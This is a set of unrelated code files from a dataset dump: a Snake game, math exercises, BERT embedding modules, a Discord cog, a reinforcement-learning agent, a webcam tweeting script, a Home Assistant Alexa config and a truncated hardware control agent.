screen.addstr(int(h/2+1),int((w-len(message3))/2),message3)\n screen.addstr(int(h/2+2),int((w-len(message4))/2),message4)\n screen.addstr(int(h/2+3),int((w-len(message5))/2),message5)\n\n screen.refresh()\n while q not in [32,10,77,109]:\n q = screen.getch()\n\n if q== 32:\n screen.clear()\n game()\n elif q == 10:\n curses.endwin()\n elif q in [77,109]:\n menu()\n\ndef menu():\n connect_server() #connect to the server\n global s # our socket\n\n screen.nodelay(0)\n screen.clear()\n curses.noecho()\n curses.curs_set(0)# cursor visibility zero\n selection = -1\n option = 0\n\n while selection < 0:\n\n graphics = [0]*5\n graphics[option] = curses.A_REVERSE\n screen.addstr(int(0),int(w/2-3), 'Snake')\n screen.addstr(int(h/2-2),int(w/2-2),'Play',graphics[0])\n screen.addstr(int(h/2-1),int(w/2-6),'Instructions',graphics[1])\n screen.addstr(int(h/2),int(w/2-6),'Game Options',graphics[2])\n screen.addstr(int(h/2+1),int(w/2-5),'High Scores',graphics[3])\n screen.addstr(int(h/2+2),int(w/2-2),'Exit',graphics[4])\n screen.refresh()\n action = screen.getch()\n if action == curses.KEY_UP:\n option = (option-1) %5\n if action == curses.KEY_DOWN:\n option = (option+1) %5\n if action == ord('\\n'):\n selection = option\n \n if selection == 0:\n game()\n elif selection ==1:\n instructions()\n elif selection ==2:\n gameoptions()\n\ndef instructions():\n screen.clear()\n screen.nodelay(0)\n lines = ['Use arrow keys to move','dont run into yourself or the snake',' ','Press any key to go back']\n \n z = 0\n for z in range(len(lines)):\n screen.addstr(int((h-len(lines))/2+z),int((w-len(lines[z]))/2),lines[z])\n \n screen.refresh()\n screen.getch()\n menu()\n\ndef gameoptions():\n global startlength,growlength,difficulty,accelration\n screen.clear()\n selection = -1\n option = 0\n\n while selection < 4:\n screen.clear()\n graphics = [0]*5\n graphics[option] = curses.A_REVERSE\n strings = ['Starting snake length: '+ str(startlength),'Snake Growth rate: '+str(growlength),'Difficulty: '+ str(difficulty),'Accelration: '+ str(accelration),'Exit']\n for z in range(len(strings)):\n screen.addstr(int((h-len(strings))/2+z),int((w-len(strings[z]))/2),strings[z],graphics[z])\n screen.refresh()\n action = screen.getch()\n\n if action == curses.KEY_UP:\n option = (option-1) %5\n if action == curses.KEY_DOWN:\n option = (option+1) %5\n if action == ord('\\n'):\n selection = option\n if action == curses.KEY_RIGHT:\n\n if option ==0 and startlength <20:\n startlength +=1\n elif option ==1 and growlength <10:\n growlength +=1\n\n if action == curses.KEY_LEFT:\n\n if option ==0 and startlength >3:\n startlength -=1\n elif option ==1 and growlength >1:\n growlength -=1\n\n\n if selection == 3:\n accelration = not accelration\n if selection == 2:\n if difficulty =='Easy':\n difficulty = 'Medium'\n elif difficulty == 'Medium':\n difficulty = 'Hard'\n else:\n difficulty = 'Easy'\n if selection < 4:\n selection = -1\n\n menu()\n\n\nmenu()\ncurses.endwin()","sub_path":"assignment2/snake IO/snake_multi.py","file_name":"snake_multi.py","file_ext":"py","file_size_in_byte":6517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"63151784","text":"\"\"\" Q4: Write a Python Program to find the factors of a number \"\"\"\n\nimport time\nfrom question2 import input_positive_integer\n\n\ndef factors(num):\n \"\"\" Accepts a string and return a list of factors of the number. \"\"\"\n i = 1\n lst = []\n head = i\n tail = num\n while i <= num:\n head = i\n if tail <= head:\n break\n if num % i == 0:\n tail = num/i\n lst.append(i)\n lst.append(tail)\n i += 1\n return lst\n\n\nif __name__ == \"__main__\":\n number = input_positive_integer(\"Enter any positive integer : \")\n start_time = time.time()\n print(\"Factors of '{0}' are {1}\".format(number, factors(number)))\n print(\"Time Taken is '%s' Seconds\" % (time.time() - start_time))\n","sub_path":"Python/Assignment9/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102698715","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Parameter\nfrom torch.nn.utils.rnn import pad_sequence\nfrom transformers import BertModel\nfrom transformers import BertTokenizer\n\n\nclass ScalarMix(torch.nn.Module):\n def __init__(self, mixture_size=4):\n super(ScalarMix, self).__init__()\n self.mixture_size = mixture_size\n self.scalar_parameters = Parameter(torch.ones(mixture_size))\n self.gamma = Parameter(torch.tensor(1.0))\n\n def forward(self, layers):\n normed_weights = F.softmax(self.scalar_parameters, dim=0)\n return self.gamma * sum(\n weight * tensor for weight, tensor in zip(normed_weights, layers)\n )\n\n\nclass Bert_Embedding(nn.Module):\n def __init__(self, bert_path, bert_layer, bert_dim, freeze=True):\n super(Bert_Embedding, self).__init__()\n self.bert_layer = bert_layer\n self.bert = BertModel.from_pretrained(bert_path, output_hidden_states=True)\n print(self.bert.config)\n self.scalar_mix = ScalarMix(bert_layer)\n\n if freeze:\n self.freeze()\n\n def forward(self, subword_idxs, subword_masks, token_starts_masks, text_masks, subwords_mask):\n self.eval()\n sen_lens = token_starts_masks.sum(dim=1)\n _, _, bert_outs = self.bert(\n subword_idxs,\n attention_mask=subword_masks\n ) # tuple([Batch_size, max_sentence_length, dim])\n bert_outs = bert_outs[-self.bert_layer:]\n bert_outs = self.scalar_mix(bert_outs)\n # bert_outs = torch.split(bert_outs[token_starts_masks], sen_lens.tolist())\n # bert_outs = pad_sequence(bert_outs, batch_first=True)\n zeros = bert_outs.new_zeros(*subwords_mask.size(), bert_outs.size(-1))\n zeros.masked_scatter_(subwords_mask.unsqueeze(-1), bert_outs[text_masks])\n subwords_lens = subwords_mask.sum(-1)\n subwords_lens += (subwords_lens == 0).type(subwords_lens.type()) # 0.0 / 0 -> 0.0 / 1\n bert_outs = zeros.sum(2) / subwords_lens.unsqueeze(-1)\n return bert_outs\n\n def freeze(self):\n for para in self.bert.parameters():\n para.requires_grad = False\n\n\nclass Bert_Encoder(nn.Module):\n def __init__(self, bert_path, bert_layer, freeze=False, fix_layer_number=None):\n super(Bert_Encoder, self).__init__()\n self.bert = BertModel.from_pretrained(bert_path, output_hidden_states=True)\n self.bert_layer = bert_layer\n\n if freeze:\n self.freeze()\n if fix_layer_number is not None:\n self.fix_several_layers(fix_layer_number)\n\n def forward(self, subword_idxs, subword_masks, token_starts_masks, text_masks, subwords_mask):\n sen_lens = token_starts_masks.sum(dim=1)\n _, _, bert_outs = self.bert(\n subword_idxs,\n token_type_ids=None,\n attention_mask=subword_masks,\n )\n bert_outs = bert_outs[-1] # the last layer of BERT outputs\n # bert_outs = torch.split(bert_outs[token_starts_masks], sen_lens.tolist())\n zeros = bert_outs.new_zeros(*subwords_mask.size(), bert_outs.size(-1))\n zeros.masked_scatter_(subwords_mask.unsqueeze(-1), bert_outs[text_masks])\n bert_outs = pad_sequence(zeros, batch_first=True)\n subwords_lens = subwords_mask.sum(-1)\n subwords_lens += (subwords_lens == 0).type(subwords_lens.type()) # 0.0 / 0 -> 0.0 / 1\n bert_outs = bert_outs.sum(2) / subwords_lens.unsqueeze(-1)\n return bert_outs\n\n def freeze(self):\n for para in self.bert.parameters():\n para.requires_grad = False\n\n def fix_several_layers(self, layer_numer):\n fixed_layer_names = [\"embeddings\"] if layer_numer >= 0 else []\n for i in range(layer_numer):\n fixed_layer_names.append(\"encoder.layer.\" + str(i) + '.')\n print(\"{} will be fixed\".format(fixed_layer_names))\n for name, para in self.bert.named_parameters():\n for layer_name in fixed_layer_names:\n if layer_name in name:\n para.requires_grad = False\n break\n\n\nclass Vocab(object):\n def __init__(self, bert_vocab_path):\n self.tokenizer = BertTokenizer.from_pretrained(\n bert_vocab_path, do_lower_case=False\n )\n\n def numericalize(self, seqs, training=True):\n subwords, masks, starts = [], [], []\n text_masks, subwords_mask = [], []\n\n for seq in seqs:\n seq = [self.tokenizer.tokenize(token) for token in seq]\n seq = [piece if piece else [\"[PAD]\"] for piece in seq]\n seq = [[\"[CLS]\"]] + seq + [[\"[SEP]\"]]\n lengths = [0] + [len(piece) for piece in seq]\n # flatten the word pieces\n tokens = sum(seq, [])\n # subwords indexes\n token_idx = torch.tensor(self.tokenizer.convert_tokens_to_ids(tokens))\n subwords.append(token_idx)\n\n # subword masks\n mask = torch.ones(len(tokens), dtype=torch.bool)\n masks.append(mask)\n # subword text mask\n text_mask = torch.BoolTensor([0] + [1] * (len(tokens) - 2) + [0])\n text_masks.append(text_mask)\n\n # record the start position of all words\n start_idxs = torch.tensor(lengths).cumsum(0)[1:-2] # bos:0 eos:-2\n # subword start masks\n start_mask = torch.zeros(len(tokens), dtype=torch.bool)\n start_mask[start_idxs] = 1\n starts.append(start_mask)\n\n # record the start and last position of all words\n start_end_idxs = torch.tensor(lengths).cumsum(0)[1:-1]\n subword_mask = [torch.ones(start_end_idxs[i + 1] - start_end_idxs[i])\n for i in range(len(start_end_idxs) - 1)]\n subword_mask = pad_sequence(subword_mask, batch_first=True)\n subwords_mask.append(subword_mask)\n max_subword_length = max(m.size(-1) for m in subwords_mask)\n max_sentence_length = max(m.size(0) for m in subwords_mask)\n subwords_mask = [F.pad(mask, (0, max_subword_length - mask.size(1), 0, max_sentence_length - mask.size(0)))\n for mask in subwords_mask] # [left, right, top, down]\n subwords_mask = torch.stack(subwords_mask)\n return subwords, masks, starts, text_masks, subwords_mask\n\n\nclass BERT_input(nn.Module):\n def __init__(self, bert_vocab_path, bert_path, bert_layer, bert_dim):\n super(BERT_input, self).__init__()\n self.vocab = Vocab(bert_vocab_path)\n self.bert_input = Bert_Embedding(bert_path, bert_layer, bert_dim)\n\n def forward(self, seqs):\n subwords, masks, starts, text_masks, subwords_mask = self.vocab.numericalize(seqs)\n subwords = pad_sequence(subwords, batch_first=True).cuda()\n masks = pad_sequence(masks, batch_first=True).cuda()\n starts = pad_sequence(starts, batch_first=True).cuda()\n text_masks = pad_sequence(text_masks, batch_first=True).type(torch.BoolTensor).cuda()\n subwords_mask = subwords_mask.type(torch.BoolTensor).cuda()\n bert_outs = self.bert_input.forward(subwords, masks, starts, text_masks, subwords_mask)\n return bert_outs\n\n\nclass BERT_model(nn.Module):\n def __init__(self, bert_vocab_path, bert_path, bert_layer, bert_dim, fix_layer_number=None):\n super(BERT_model, self).__init__()\n self.vocab = Vocab(bert_vocab_path)\n self.bert_encoder = Bert_Encoder(bert_path, bert_layer,\n freeze=False, fix_layer_number=fix_layer_number)\n\n def forward(self, seqs):\n subwords, masks, starts, text_masks, subwords_mask = self.vocab.numericalize(seqs)\n subwords = pad_sequence(subwords, batch_first=True).cuda()\n masks = pad_sequence(masks, batch_first=True).cuda()\n starts = pad_sequence(starts, batch_first=True).type(torch.BoolTensor).cuda()\n text_masks = pad_sequence(text_masks, batch_first=True).type(torch.BoolTensor).cuda()\n subwords_mask = subwords_mask.type(torch.BoolTensor).cuda()\n bert_outs = self.bert_encoder.forward(subwords, masks, starts, text_masks, subwords_mask)\n return bert_outs\n","sub_path":"src/orl-4.1-ultimate-hard-e2e/neural_srl/pytorch/pre_trained_language_model.py","file_name":"pre_trained_language_model.py","file_ext":"py","file_size_in_byte":8212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"283617275","text":"def fibb_rekurencyjnie(n):\n if n<=1 or n==2:\n return 1\n else:\n tmp = fibb_rekurencyjnie(n-1) + fibb_rekurencyjnie(n-2)\n return tmp\n\ndef fibb_iteracyjnie(n):\n liczba_n_1 = 1\n liczba_n_2 = 1\n \n for i in range(n-1):\n liczba_n_2 += liczba_n_1\n liczba_n_1 = liczba_n_2-liczba_n_1\n \n return liczba_n_1\n \nx = int(input(\"Podaj n: \"))\n\nwynik = fibb_rekurencyjnie(x)\nwynik2 = fibb_iteracyjnie(x)\n\nprint(\"rek: fibb = \",wynik)\nprint(\"iter: fibb = \",wynik2)","sub_path":"WDI/Zajecia4/Zadanie2.py","file_name":"Zadanie2.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"88651626","text":"'''Remove premium from a server'''\n\nfrom discord.ext import commands\nfrom packages.utils import Embed, ImproperType\nfrom mongoclient import DBClient\nclass Command(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n \n @commands.command()\n async def removepremium(self, ctx):\n #return await ctx.send('This command is currently under maintenance. The developers will try to get it up again as soon as possible. In the meantime feel free to use `n.help` to get the other commands. Thank you for your understanding!')\n if (ctx.author.id) not in [396075607420567552, 505338178287173642, 637638904513691658]:\n embed = Embed('Error!', 'You\\'re not a developer of this bot! Click [here](https://www.latlmes.com/entertainment/dev-application-1) to apply for dev.', 'warning')\n\n embed.footer(f'⚙️This command is a 🛠️developer🛠️ only command.⚙️', 'https://cdn.discordapp.com/attachments/719414661686099993/754971786231283712/season-callout-badge.png')\n\n return await embed.send(ctx)\n #data = json.loads(requests.get('https://test-db.nitrotypers.repl.co', data={'key': os.getenv('DB_KEY')}).text)\n dbclient = DBClient()\n collection = dbclient.db.premium\n data = await dbclient.get_big_array(collection, 'premium')\n for x in data['premium']:\n if x['serverID'] == str(ctx.author.guild.id):\n data['premium'].pop(data['premium'].index(x))\n break\n #requests.post('https://test-db.nitrotypers.repl.co', data={'key': os.getenv('DB_KEY'), 'data': json.dumps(data)})\n await dbclient.update_big_array(collection, 'premium', data)\n embed = Embed('Success!', f'Server {str(ctx.author.guild.id)} has been removed from premium!', 'white_check_mark')\n embed.footer(f'⚙️This command is a 🛠️developer🛠️ only command.⚙️', 'https://cdn.discordapp.com/attachments/719414661686099993/754971786231283712/season-callout-badge.png')\n await embed.send(ctx)\n try:\n await ctx.message.delete()\n except:\n pass\n \ndef setup(client):\n client.add_cog(Command(client))","sub_path":"commands/dev/removepremium.py","file_name":"removepremium.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111916273","text":"# pylint: disable=g-bad-file-header\n# Copyright 2019 DeepMind Technologies Limited. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"A simple TensorFlow-based implementation of a recurrent actor-critic.\n\nReferences:\n1. \"Simple Statistical Gradient-Following Algorithms for Connectionist\n Reinforcement Learning\" (Williams, 1992).\n2. \"Long Short-Term Memory\" (Hochreiter, 1991).\n\nLinks:\n1. http://www-anw.cs.umass.edu/~barto/courses/cs687/williams92simple.pdf.\n2. https://www.bioinf.jku.at/publications/older/2604.pdf\n\"\"\"\n\n# Import all packages\n\nfrom bsuite.baselines import base\nimport dm_env\nfrom dm_env import specs\nimport numpy as np\nimport sonnet as snt\nimport tensorflow as tf\nfrom trfl.discrete_policy_gradient_ops import discrete_policy_gradient_loss\nfrom trfl.value_ops import td_lambda as td_lambda_loss\nfrom typing import Sequence\n\nnest = tf.contrib.framework.nest\n\n\nclass ActorCriticRNN(base.Agent):\n \"\"\"A recurrent TensorFlow-based feedforward actor-critic implementation.\"\"\"\n\n def __init__(\n self,\n obs_spec: specs.Array,\n action_spec: specs.DiscreteArray,\n network: snt.RNNCore,\n optimizer: tf.train.Optimizer,\n sequence_length: int,\n td_lambda: float,\n agent_discount: float,\n seed: int,\n ):\n \"\"\"A recurrent actor-critic agent.\"\"\"\n del action_spec # unused\n tf.set_random_seed(seed)\n self._sequence_length = sequence_length\n self._num_transitions_in_buffer = 0\n\n # Create the policy ops.\n obs = tf.placeholder(shape=(1,) + obs_spec.shape, dtype=obs_spec.dtype)\n mask = tf.placeholder(shape=(1,), dtype=tf.float32)\n state = self._placeholders_like(network.initial_state(batch_size=1))\n (online_logits, _), next_state = network((obs, mask), state)\n action = tf.squeeze(tf.multinomial(online_logits, 1, output_dtype=tf.int32))\n\n # Create placeholders and numpy arrays for learning from trajectories.\n shapes = [obs_spec.shape, (), (), (), ()]\n dtypes = [obs_spec.dtype, np.int32, np.float32, np.float32, np.float32]\n\n placeholders = [\n tf.placeholder(shape=(self._sequence_length, 1) + shape, dtype=dtype)\n for shape, dtype in zip(shapes, dtypes)]\n observations, actions, rewards, discounts, masks = placeholders\n\n # Build actor and critic losses.\n (logits, values), final_state = tf.nn.dynamic_rnn(\n network, (observations, tf.expand_dims(masks, -1)),\n initial_state=state, dtype=tf.float32, time_major=True)\n (_, bootstrap_value), _ = network((obs, mask), final_state)\n values, bootstrap_value = nest.map_structure(\n lambda t: tf.squeeze(t, axis=-1), (values, bootstrap_value))\n critic_loss, (advantages, _) = td_lambda_loss(\n state_values=values,\n rewards=rewards,\n pcontinues=agent_discount * discounts,\n bootstrap_value=bootstrap_value,\n lambda_=td_lambda)\n actor_loss = discrete_policy_gradient_loss(logits, actions, advantages)\n\n # Updates.\n grads_and_vars = optimizer.compute_gradients(actor_loss + critic_loss)\n grads, _ = tf.clip_by_global_norm([g for g, _ in grads_and_vars], 5.)\n grads_and_vars = [(g, pair[1]) for g, pair in zip(grads, grads_and_vars)]\n train_op = optimizer.apply_gradients(grads_and_vars)\n\n # Create TF session and callables.\n session = tf.Session()\n self._reset_fn = session.make_callable(\n network.initial_state(batch_size=1))\n self._policy_fn = session.make_callable(\n [action, next_state], [obs, mask, state])\n self._update_fn = session.make_callable(\n [train_op, final_state], placeholders + [obs, mask, state])\n session.run(tf.global_variables_initializer())\n\n # Initialize numpy buffers\n self.state = self._reset_fn()\n self.update_init_state = self._reset_fn()\n self.arrays = [\n np.zeros(shape=(self._sequence_length, 1) + shape, dtype=dtype)\n for shape, dtype in zip(shapes, dtypes)]\n\n def _placeholders_like(self, tensor_nest):\n \"\"\"Create placeholders with given nested structure, shape, and type.\"\"\"\n return nest.map_structure(\n lambda t: tf.placeholder(shape=t.shape, dtype=t.dtype), tensor_nest)\n\n def _compute_entropy_loss(self, logits):\n \"\"\"Compute entropy loss for a set of policy logits.\"\"\"\n policy = tf.nn.softmax(logits)\n log_policy = tf.nn.log_softmax(logits)\n return -tf.reduce_sum(-policy * log_policy)\n\n def policy(self, timestep: dm_env.TimeStep) -> base.Action:\n \"\"\"Selects actions according to the latest softmax policy.\"\"\"\n action, self.state = self._policy_fn(\n np.expand_dims(timestep.observation, 0),\n np.expand_dims(float(not timestep.first()), 0),\n self.state)\n return np.int32(action)\n\n def update(self, old_step: dm_env.TimeStep, action: base.Action,\n new_step: dm_env.TimeStep):\n \"\"\"Receives a transition and performs a learning update.\"\"\"\n\n # Insert this step into our rolling window 'batch'.\n items = [\n old_step.observation, action, new_step.reward, new_step.discount,\n float(not old_step.step_type.first())]\n for buf, item in zip(self.arrays, items):\n buf[self._num_transitions_in_buffer % self._sequence_length, 0] = item\n self._num_transitions_in_buffer += 1\n\n # When the batch is full, do a step of SGD.\n if self._num_transitions_in_buffer % self._sequence_length == 0:\n _, self.update_init_state = self._update_fn(*(self.arrays + [\n np.expand_dims(new_step.observation, 0),\n np.expand_dims(float(not new_step.step_type.first()), 0),\n self.update_init_state]))\n\n\nclass PolicyValueRNN(snt.RNNCore):\n \"\"\"A recurrent multilayer perceptron with a value and a policy head.\"\"\"\n\n def __init__(self, hidden_sizes: Sequence[int], num_actions: int):\n self._num_actions = num_actions\n super(PolicyValueRNN, self).__init__(name='policy_value_net')\n with self._enter_variable_scope():\n self._torso = snt.nets.MLP(hidden_sizes, activate_final=True, name='net')\n self._core = snt.LSTM(hidden_sizes[-1], name='rnn')\n self._policy_head = snt.Linear(num_actions, name='policy')\n self._value_head = snt.Linear(1, name='value')\n\n def _build(self, inputs_and_mask, state):\n inputs, mask = inputs_and_mask\n inputs = snt.BatchFlatten()(inputs)\n hiddens = self._torso(inputs)\n state = state._replace(hidden=state.hidden*mask, cell=state.cell*mask)\n lstm_output, next_state = self._core(inputs, state)\n lstm_output = tf.nn.relu(lstm_output) + hiddens # skip connection\n logits = self._policy_head(lstm_output)\n value = self._value_head(lstm_output)\n return (logits, value), next_state\n\n @property\n def state_size(self):\n \"\"\"Forward size(s) of state(s) used by the wrapped core.\"\"\"\n return self._core.state_size\n\n @property\n def output_size(self):\n \"\"\"Forward size of outputs produced by the wrapped core.\"\"\"\n return (self._num_actions, 1)\n\n def initial_state(self, *args, **kwargs):\n \"\"\"Creates the core initial state.\"\"\"\n return self._core.initial_state(*args, **kwargs)\n\n\ndef default_agent(obs_spec: specs.Array,\n action_spec: specs.DiscreteArray):\n \"\"\"Initialize a DQN agent with default parameters.\"\"\"\n network = PolicyValueRNN(\n hidden_sizes=[64, 64],\n num_actions=action_spec.num_values,\n )\n return ActorCriticRNN(\n obs_spec=obs_spec,\n action_spec=action_spec,\n network=network,\n optimizer=tf.train.AdamOptimizer(learning_rate=3e-3),\n sequence_length=32,\n td_lambda=0.9,\n agent_discount=0.99,\n seed=42,\n )\n","sub_path":"bsuite/baselines/actor_critic_rnn/actor_critic_rnn.py","file_name":"actor_critic_rnn.py","file_ext":"py","file_size_in_byte":8137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49951980","text":"import cv2\nimport os\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dense, Flatten, Dropout\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.datasets import mnist\nfrom keras.optimizers import Adam\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.utils import np_utils\nfrom random import sample\nfrom keras.models import model_from_json\nimport psutil\nimport easygui\nfrom tweet import post_picture\nfrom time import sleep, time\nfrom datetime import datetime\nfrom audio import bark\nfrom url import get_url\nfrom model import predict\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"a\", nargs='?', default=\"empty\")\nargs = parser.parse_args()\n\n \np = psutil.Process(os.getpid())\np.nice(19) # set>>> p.nice()10\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n \ncam = cv2.VideoCapture(0) \n\n\npath = '/home/felipe/final'\n\nwait = 0\nWAIT_TURNS = 240\n\nSCORE_THRESHOLD = 0.90 # > \nSOUND_THRESHOLD = 0.90\ntime_init = time()\ntime_end = 0\n\npic_enabled = True\n\nold_sound = 0\n\ncommand_delay = 0\n\ncommand = \"Init\"\n\npic_ok = \"O\"\n\nloop = 20\n\nwhile True:\n\n score = 0\n \n pic_ok = \"O\"\n \n now = datetime.now() \n time_taken = time() \n \n current_sound = bark()\n \n dif = current_sound - old_sound\n \n if dif >= 0:\n \n sound = dif\n \n else:\n \n sound = 0 \n \n print(\"Sound:\", '{:04f}'.format(sound))\n \n \n s, img = cam.read()\n \n if args.a == 'nocam':\n \n pass\n \n else:\n \n cv2.imshow(\"Cam\", img)\n cv2.waitKey(1) \n \n time_id = '{:02d}'.format(now.day)+\"-\"+'{:02d}'.format(now.month)+\"-\"+str(now.year)+\"-\"+'{:02d}'.format(now.hour)+\":\"+'{:02d}'.format(now.minute)+\":\"+'{:02d}'.format(now.second)\n \n if sound > SOUND_THRESHOLD:\n \n score = predict(img) \n \n print(\"W:\", str(wait).zfill(2), \"Score:\", '{:04f}'.format(score), \"Sound:\", '{:04f}'.format(sound), \"Time:\", time_id)\n \n \n if now.hour < 20 and now.hour > 6:\n \n if score > SCORE_THRESHOLD and wait == 0:\n \n cv2.imwrite(path+\"/auto_tweet.png\",img)\n \n pic_ok = \"X\"\n\n wait = WAIT_TURNS\n \n try:\n \n print(\"Postando foto\")\n \n if pic_enabled:\n \n post_picture(path+\"/auto_tweet.png\")\n \n except:\n \n print(\"Corrigir\")\n \n \n if wait > 0:\n \n wait -= 1 \n \n \n f = open(\"report.txt\", 'a')\n\n f.write(\"W: \"+ str(wait).zfill(2) + \" \" + str(time_id) + \" S: \" + '{:04f}'.format(score) + \" V: \" + '{:04f}'.format(sound) + \" \" + pic_ok + \"\\n\")\n\n f.close() \n\n\n\n command_delay = (command_delay + 1) % loop\n \n if command_delay == 0:\n \n try:\n command = get_url() \n if command == \"reboot\" or command == \"Reboot\":\n os.system(\"reboot\") \n elif command == \"shutdown\" or command == \"Shutdown\":\n os.system(\"shutdown now\")\n elif command == \"enable\" or command == \"Enable\":\n pic_enabled = True \n elif command == \"disable\" or command == \"Disable\":\n pic_enabled = False \n except: \n pass\n \n time_end = time() \n \n \n print('{:04f}'.format(time_end - time_taken), \"Segundos \", \"Comando:\", command, \"-\", command_delay, \"Time:\", time_id) \n \n f = open(\"last_run.txt\",\"w\")\n f.write(time_id+\"\\n\")\n f.close()\n \n old_sound = sound\n","sub_path":"cam_model.py","file_name":"cam_model.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559363521","text":"\"\"\"Config helpers for Alexa.\"\"\"\nfrom abc import ABC, abstractmethod\n\nfrom homeassistant.core import callback\n\nfrom .state_report import async_enable_proactive_mode\n\n\nclass AbstractConfig(ABC):\n \"\"\"Hold the configuration for Alexa.\"\"\"\n\n _unsub_proactive_report = None\n\n def __init__(self, hass):\n \"\"\"Initialize abstract config.\"\"\"\n self.hass = hass\n\n @property\n def supports_auth(self):\n \"\"\"Return if config supports auth.\"\"\"\n return False\n\n @property\n def should_report_state(self):\n \"\"\"Return if states should be proactively reported.\"\"\"\n return False\n\n @property\n def endpoint(self):\n \"\"\"Endpoint for report state.\"\"\"\n return None\n\n @property\n @abstractmethod\n def locale(self):\n \"\"\"Return config locale.\"\"\"\n\n @property\n def entity_config(self):\n \"\"\"Return entity config.\"\"\"\n return {}\n\n @property\n def is_reporting_states(self):\n \"\"\"Return if proactive mode is enabled.\"\"\"\n return self._unsub_proactive_report is not None\n\n @callback\n @abstractmethod\n def user_identifier(self):\n \"\"\"Return an identifier for the user that represents this config.\"\"\"\n\n async def async_enable_proactive_mode(self):\n \"\"\"Enable proactive mode.\"\"\"\n if self._unsub_proactive_report is None:\n self._unsub_proactive_report = self.hass.async_create_task(\n async_enable_proactive_mode(self.hass, self)\n )\n try:\n await self._unsub_proactive_report\n except Exception:\n self._unsub_proactive_report = None\n raise\n\n async def async_disable_proactive_mode(self):\n \"\"\"Disable proactive mode.\"\"\"\n unsub_func = await self._unsub_proactive_report\n if unsub_func:\n unsub_func()\n self._unsub_proactive_report = None\n\n @callback\n def should_expose(self, entity_id):\n \"\"\"If an entity should be exposed.\"\"\"\n # pylint: disable=no-self-use\n return False\n\n @callback\n def async_invalidate_access_token(self):\n \"\"\"Invalidate access token.\"\"\"\n raise NotImplementedError\n\n async def async_get_access_token(self):\n \"\"\"Get an access token.\"\"\"\n raise NotImplementedError\n\n async def async_accept_grant(self, code):\n \"\"\"Accept a grant.\"\"\"\n raise NotImplementedError\n","sub_path":"homeassistant/components/alexa/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"217337260","text":"from ocs import ocs_agent\nfrom ocs.Lakeshore.Lakeshore240 import Module\nimport random\nimport time\nimport threading\nimport pyrogue as pr\nfrom FpgaTopLevel import *\n\n\nclass Smurf_Agent:\n\n def __init__(self, agent):\n self.agent = agent\n self.lock = threading.Semaphore()\n self.job = None\n\n self.args = {\n \"simGui\": False,\n \"commType\": \"eth-rssi-interleaved\",\n \"ipAddr\": \"192.168.2.20\",\n \"slot\": 2,\n \"pollEn\": True\n }\n self.base = None\n\n def close(self):\n print(\"Closing connection\")\n if self.base is not None:\n self.base.stop()\n\n def try_set_job(self, job_name):\n with self.lock:\n if self.job == None:\n self.job = job_name\n return True, 'ok.'\n return False, 'Conflict: \"%s\" is already running.' % self.job\n\n def set_job_done(self):\n with self.lock:\n self.job = None\n\n #Init smurf task\n def init_hardware(self, session, params=None):\n\n self.base = pr.Root(name='AMCc', description='')\n\n self.base.add(FpgaTopLevel(\n simGui = self.args[\"simGui\"],\n commType = self.args['commType'],\n ipAddr = self.args['ipAddr'],\n pcieRssiLink = (int(self.args['slot']) - 2)\n ))\n\n streamDataWriter = pr.utilities.fileio.StreamWriter(name=\"streamDataWriter\")\n self.base.add(streamDataWriter)\n\n pr.streamConnect(self.base.FpgaTopLevel.stream.application(0xC1), self.base.streamDataWriter.getChannel(0))\n\n self.base.start(pollEn = self.args['pollEn'])\n\n return True, \"Hardware Initialized\"\n\n #Load config file\n def read_config(self, session, params={}):\n \"\"\"\n Loads configuration file\n\n params:\n - filename: path to the config file\n \"\"\"\n filename = params.get(\"filename\")\n\n if filename is None:\n print(\"filename must be specified in params. File not loaded.\")\n return False, \"Correct params not specified\"\n\n self.base.ReadConfig(filename)\n\n return True, \"Loaded config file {}\".format(filename)\n\n def node_from_path(self, path):\n \"\"\"\n Returns a pyrogue node from a given path.\n\n params:\n - path: A list containing the sequence of node names\n \"\"\"\n cur_node = self.base\n for node in path:\n next_node = cur_node.nodes.get(node)\n if next_node is None:\n raise ValueError(\"{} has no child {}\".format(cur_node.name, node))\n cur_node = next_node\n\n return cur_node\n\n\n def set_variable(self, session, params={}):\n \"\"\"\n Sets variable\n params:\n - path: Path to the variable in the form of a list of node names\n - value: value to set\n - write: write \n \"\"\"\n print(params)\n path = params.get('path')\n value = params.get('value')\n write = params.get('write', True)\n\n if path is None or value is None:\n raise ValueError(\"Must specify path and value in params\")\n\n variable = self.node_from_path(path)\n variable.set(value, write=write)\n\n return True, \"Varibale {} set to {}\".format(variable.name, value)\n\n def add_listener(self, session, params={}):\n \"\"\"\n Adds 